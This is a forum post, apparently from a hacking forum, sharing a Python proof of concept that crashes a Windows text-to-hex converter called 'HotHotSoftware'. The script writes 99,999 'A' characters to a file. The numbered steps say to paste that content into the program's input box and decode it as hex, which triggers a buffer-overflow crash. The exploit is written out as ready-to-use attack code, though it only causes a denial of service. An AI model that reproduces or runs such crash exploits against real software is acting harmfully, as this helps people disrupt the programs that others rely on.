[Python] HotHotSoftware Crash POC (2 Viewers)

Joined
Mar 11, 2016
Credits
0
Rating - 0%
# How To Use:
# 1) Run python code : python bof.py
# 2) Open neo.txt and copy all content
# 3) HotHostSoftware
# 4) Paste All content into Input Format Box
# 5) To Crash PoC select Hex in Output Format
# 6) And Click Decode/Emcode Content
# 7) Crashed :p
Code:
#!/usr/bin/env python

# Title : Crash Proof Of Concept
# Vendor : HotHotSoftware Text Convert into ASCII, Hex
# Tested : Windows XP / Windows 7
#
# Author      :   Ne0-h4ck3r
# Email       :   [email protected]
# Web         :   http://blackcoder.info
#
# How To Use:
# 1) Run python code : python bof.py
# 2) Open neo.txt and copy all content
# 3) HotHostSoftware
# 4) Paste All content into Input Format Box
# 5) To Crash PoC select Hex in Output Format
# 6) And Click Decode/Emcode Content
# 7) Crashed :P

dos = "\x41" * 99999
with open("neo.txt", 'w') as f:
    f.write(dos)
 

Users who are viewing this thread

Top